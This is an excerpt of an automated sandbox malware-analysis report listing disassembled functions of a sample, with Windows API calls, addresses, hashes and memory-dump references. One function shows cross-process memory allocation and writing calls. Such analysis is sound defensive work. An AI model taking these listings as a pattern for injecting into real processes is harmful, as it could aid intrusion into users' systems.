                                                                                                                            • Opcode ID: 7f83f08317a26c49ea3237e6e3e6fd980fde226f63d8f93617c399e018ab9393
                                                                                                                            • Instruction ID: 75c729eed606767f71d6972ed25cca9462bf30cdcb3e16735d2fa7926a73dd14
                                                                                                                            • Opcode Fuzzy Hash: 7f83f08317a26c49ea3237e6e3e6fd980fde226f63d8f93617c399e018ab9393
                                                                                                                            • Instruction Fuzzy Hash: D001B572B001067BD224AB115D52FBFB35CEE613B8F048021FE0996282EB64DE11B2A2
                                                                                                                            Function 00F44A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00F44ABA
                                                                                                                            • __beginthreadex.LIBCMT ref: 00F44AD8
                                                                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00F44AED
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F44B03
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F44B0A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3824534824-0
                                                                                                                            • Opcode ID: 062520fac773e0a502a5c7043ef67d0e710bb85b5860d1625db74aa0f369338e
                                                                                                                            • Instruction ID: 1487b4a93c63490465dd998c20b813c51826f8b00651acea0c1ebc2159d89e0c
                                                                                                                            • Opcode Fuzzy Hash: 062520fac773e0a502a5c7043ef67d0e710bb85b5860d1625db74aa0f369338e
                                                                                                                            • Instruction Fuzzy Hash: FD1108B690561CBBC7009FA8EC08B9B7FACEB46320F144265FC24E3250D6B5D904ABA0
                                                                                                                            Function 00F38202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F3821E
                                                                                                                            • GetLastError.KERNEL32(?,00F37CE2,?,?,?), ref: 00F38228
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00F37CE2,?,?,?), ref: 00F38237
                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00F37CE2,?,?,?), ref: 00F3823E
                                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F38255
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 842720411-0
                                                                                                                            • Opcode ID: 73f29324f5f3e2803e5a9a1966761fb4f1cc77df4ed97d39a01ffeb903d1f987
                                                                                                                            • Instruction ID: a5b036124739ea240107505d7bbc481edea70759dba28ff6145b4cc7c0051806
                                                                                                                            • Opcode Fuzzy Hash: 73f29324f5f3e2803e5a9a1966761fb4f1cc77df4ed97d39a01ffeb903d1f987
                                                                                                                            • Instruction Fuzzy Hash: B6016271600208BFDB104FA5EC48D677B6CFF867A4B500429F819C2220DAB6CC15EA60
                                                                                                                            Function 00F3710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F37044,80070057,?,?,?,00F37455), ref: 00F37127
                                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F37044,80070057,?,?), ref: 00F37142
                                                                                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F37044,80070057,?,?), ref: 00F37150
                                                                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F37044,80070057,?), ref: 00F37160
                                                                                                                            • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F37044,80070057,?,?), ref: 00F3716C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3897988419-0
                                                                                                                            • Opcode ID: 1c7d044f751ab1da388070f0e149a8111913fcad405c0c7e198a92b80e58c8b8
                                                                                                                            • Instruction ID: 3eecea158af60c81c1150dcfc9bc34208ae0a758a23ce0f18ab8ccc3dc6d7501
                                                                                                                            • Opcode Fuzzy Hash: 1c7d044f751ab1da388070f0e149a8111913fcad405c0c7e198a92b80e58c8b8
                                                                                                                            • Instruction Fuzzy Hash: 91015EB3605308ABDB216F64EC44AAA7BADEB44761F1400A4FD44D2220D771DD40B7A0
                                                                                                                            Function 00F45244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F45260
                                                                                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F4526E
                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F45276
                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F45280
                                                                                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F452BC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2833360925-0
                                                                                                                            • Opcode ID: 2b64c9b01b4c8ed4c801c0f39727d4edbc01f15b6af50594429fe7b61fa152f7
                                                                                                                            • Instruction ID: 159f872c91863cfef9a806e2caa7cfe1b6170700343b5258e01c4c80571d961f
                                                                                                                            • Opcode Fuzzy Hash: 2b64c9b01b4c8ed4c801c0f39727d4edbc01f15b6af50594429fe7b61fa152f7
                                                                                                                            • Instruction Fuzzy Hash: CE012932D01A1DDBCF00EFE4EC49AEDBB78FB0AB11F400156E951B2142CBB09654ABA5
                                                                                                                            Function 00F3810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F38121
                                                                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F3812B
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F3813A
                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F38141
                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F38157
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 44706859-0
                                                                                                                            • Opcode ID: c91c81c7b324bb153dff5d7a46231b4cbbd7cc1856d95a04082ef6dac8260f3e
                                                                                                                            • Instruction ID: edc3ec0edcb4b4693a57ac73be442243c3277b6c5e50b20e494e62996eb74f17
                                                                                                                            • Opcode Fuzzy Hash: c91c81c7b324bb153dff5d7a46231b4cbbd7cc1856d95a04082ef6dac8260f3e
                                                                                                                            • Instruction Fuzzy Hash: 14F06271600308BFEB111FA5EC88E673BACFF4A7A4F000025F995C6150CBA59D46FA60
                                                                                                                            Function 00F3C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00F3C1F7
                                                                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00F3C20E
                                                                                                                            • MessageBeep.USER32(00000000), ref: 00F3C226
                                                                                                                            • KillTimer.USER32(?,0000040A), ref: 00F3C242
                                                                                                                            • EndDialog.USER32(?,00000001), ref: 00F3C25C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3741023627-0
                                                                                                                            • Opcode ID: a05f7362d42c1e7f4bc402b625140a7ab8064714bb7bdc78520dd33c6cded66a
                                                                                                                            • Instruction ID: 3d7f5185634ffc6508de254770c994bbad2e253fda025a7c5a8b0f3f7864afee
                                                                                                                            • Opcode Fuzzy Hash: a05f7362d42c1e7f4bc402b625140a7ab8064714bb7bdc78520dd33c6cded66a
                                                                                                                            • Instruction Fuzzy Hash: 2201DB3080430897EB205B54ED4EF9777B8FF00716F000269F592B14F0D7F5A958AB90
                                                                                                                            Function 00EE13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EndPath.GDI32(?), ref: 00EE13BF
                                                                                                                            • StrokeAndFillPath.GDI32(?,?,00F1B888,00000000,?), ref: 00EE13DB
                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00EE13EE
                                                                                                                            • DeleteObject.GDI32 ref: 00EE1401
                                                                                                                            • StrokePath.GDI32(?), ref: 00EE141C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2625713937-0
                                                                                                                            • Opcode ID: 6b2b75bef23842834cd8bb3fca12c1a6ad6e06dc2d31cf6668d0669dc40a4cda
                                                                                                                            • Instruction ID: 24633e671e82a5bea2e13abe87ff4c13f480f48f7cd21559342bb26eeba5e676
                                                                                                                            • Opcode Fuzzy Hash: 6b2b75bef23842834cd8bb3fca12c1a6ad6e06dc2d31cf6668d0669dc40a4cda
                                                                                                                            • Instruction Fuzzy Hash: 46F0EC70004B4CEBDB115F66EC4C7583FA4AB02B26F089264E43A595F2C7794999EF51
                                                                                                                            Function 00F4C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00F4C432
                                                                                                                            • CoCreateInstance.OLE32(00F72D6C,00000000,00000001,00F72BDC,?), ref: 00F4C44A
                                                                                                                              • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
                                                                                                                            • CoUninitialize.OLE32 ref: 00F4C6B7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                            • String ID: .lnk
                                                                                                                            • API String ID: 2683427295-24824748
                                                                                                                            • Opcode ID: 739c7b9b3e5acfac6ab9bdf86f8e54d487b41ccbb1096f4d1a212ffc0f1903cf
                                                                                                                            • Instruction ID: d6a20e558e3fa8f84f47b954cf98ef89b631900684191022c3981749f24d9862
                                                                                                                            • Opcode Fuzzy Hash: 739c7b9b3e5acfac6ab9bdf86f8e54d487b41ccbb1096f4d1a212ffc0f1903cf
                                                                                                                            • Instruction Fuzzy Hash: CDA14CB1104249AFD700EF55CC81EABB7E8FF89354F00492CF599971A2EB71EA09CB52
                                                                                                                            Function 00EF2CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F00DB6: std::exception::exception.LIBCMT ref: 00F00DEC
                                                                                                                              • Part of subcall function 00F00DB6: __CxxThrowException@8.LIBCMT ref: 00F00E01
                                                                                                                              • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
                                                                                                                              • Part of subcall function 00EE7A51: _memmove.LIBCMT ref: 00EE7AAB
                                                                                                                            • __swprintf.LIBCMT ref: 00EF2ECD
                                                                                                                            Strings
                                                                                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00EF2D66
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                            • API String ID: 1943609520-557222456
                                                                                                                            • Opcode ID: 93d7eee0023bc3af03fd4fdd11387b1dc5295d24b1a8930b1d504c58bf2390a0
                                                                                                                            • Instruction ID: e9b343709d8d11350258e7689b8d4c474d55edf7ba13cf49105dde0b801b6c8d
                                                                                                                            • Opcode Fuzzy Hash: 93d7eee0023bc3af03fd4fdd11387b1dc5295d24b1a8930b1d504c58bf2390a0
                                                                                                                            • Instruction Fuzzy Hash: 4791AB321082599FC714EF24D885C7EB7E8EF85310F10581DFA86AB2A2EB30ED44DB52
                                                                                                                            Function 00F4B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EE4743,?,?,00EE37AE,?), ref: 00EE4770
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00F4B9BB
                                                                                                                            • CoCreateInstance.OLE32(00F72D6C,00000000,00000001,00F72BDC,?), ref: 00F4B9D4
                                                                                                                            • CoUninitialize.OLE32 ref: 00F4B9F1
                                                                                                                              • Part of subcall function 00EE9837: __itow.LIBCMT ref: 00EE9862
                                                                                                                              • Part of subcall function 00EE9837: __swprintf.LIBCMT ref: 00EE98AC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                            • String ID: .lnk
                                                                                                                            • API String ID: 2126378814-24824748
                                                                                                                            • Opcode ID: f6f41188e1cdba307809c5742ba909b5396c9aa613ee9deedd836c6c98ef5749
                                                                                                                            • Instruction ID: e6587f2e26b5102b042f4dc8c897228f2102859608df6c15f5a3b551e85ab822
                                                                                                                            • Opcode Fuzzy Hash: f6f41188e1cdba307809c5742ba909b5396c9aa613ee9deedd836c6c98ef5749
                                                                                                                            • Instruction Fuzzy Hash: A2A168756043459FCB04DF15C884D6ABBE5FF89324F148998F899AB3A2CB31EC45CB92
                                                                                                                            Function 00F0501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 00F050AD
                                                                                                                              • Part of subcall function 00F100F0: __87except.LIBCMT ref: 00F1012B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorHandling__87except__start
                                                                                                                            • String ID: pow
                                                                                                                            • API String ID: 2905807303-2276729525
                                                                                                                            • Opcode ID: 69055be2d0be65f33ecacd28fa061409ae207c0c6d853067bf219804cb852fc0
                                                                                                                            • Instruction ID: b8cdb9a91780db8fa061b9640aeb55cce5392164d1778405b08b7aea093d5581
                                                                                                                            • Opcode Fuzzy Hash: 69055be2d0be65f33ecacd28fa061409ae207c0c6d853067bf219804cb852fc0
                                                                                                                            • Instruction Fuzzy Hash: B3516A71E0C60696DB12B724CD013AF3BD49B41B20F208D59F4D5862E9EEF88DC4BE86
                                                                                                                            Function 00F28584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: 3c$_
                                                                                                                            • API String ID: 4104443479-4099079164
                                                                                                                            • Opcode ID: 344c31a6a2cf97e11b07385a55a9dff4302fe7ad25c8adc8a8727c166c59e6d7
                                                                                                                            • Instruction ID: df6ace0a59e3bef7067bd212d1a12bbef2231ebfdcae34bf043575a4895d62c6
                                                                                                                            • Opcode Fuzzy Hash: 344c31a6a2cf97e11b07385a55a9dff4302fe7ad25c8adc8a8727c166c59e6d7
                                                                                                                            • Instruction Fuzzy Hash: FF516070E016199FCF24CF68D880AAEBBF1FF44354F248529E85AE7250EB30AD56DB51
                                                                                                                            Function 00F397F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F414BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F39296,?,?,00000034,00000800,?,00000034), ref: 00F414E6
                                                                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00F3983F
                                                                                                                              • Part of subcall function 00F41487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F392C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00F414B1
                                                                                                                              • Part of subcall function 00F413DE: GetWindowThreadProcessId.USER32(?,?), ref: 00F41409
                                                                                                                              • Part of subcall function 00F413DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00F3925A,00000034,?,?,00001004,00000000,00000000), ref: 00F41419
                                                                                                                              • Part of subcall function 00F413DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F3925A,00000034,?,?,00001004,00000000,00000000), ref: 00F4142F
                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F398AC
                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F398F9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
